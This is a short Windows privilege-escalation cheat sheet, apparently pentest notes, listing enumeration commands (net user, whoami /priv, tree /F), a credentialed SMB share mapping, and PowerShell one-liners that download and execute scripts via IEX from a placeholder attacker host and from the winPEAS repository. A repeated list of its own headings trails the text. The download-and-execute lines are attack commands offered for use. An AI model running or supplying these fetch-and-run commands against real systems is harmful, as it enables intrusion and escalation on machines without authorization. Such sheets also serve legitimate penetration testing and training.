Windows Privilege Escalation

System Enumeration

List Users

net user

User Privileges

whoami /priv

Search Files

If you dont know the full path of the file or even the extension, you can use: *<FILE>*

cmd /s <FILE>

List Recursive Directories

tree /F

net use z: \\<ip>\<share> /user:<user> <pass>

Execute Remote PowerShell Script

IEX(New-Object Net.WebClient).downloadString('http://<ip>/script.ps1')

WinPEAS

powershell "IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')"

System Enumeration

List Users

User Privileges

Search Files

List Recursive Directories

Add SMB share to network drives

Execute Remote PowerShell Script

WinPEAS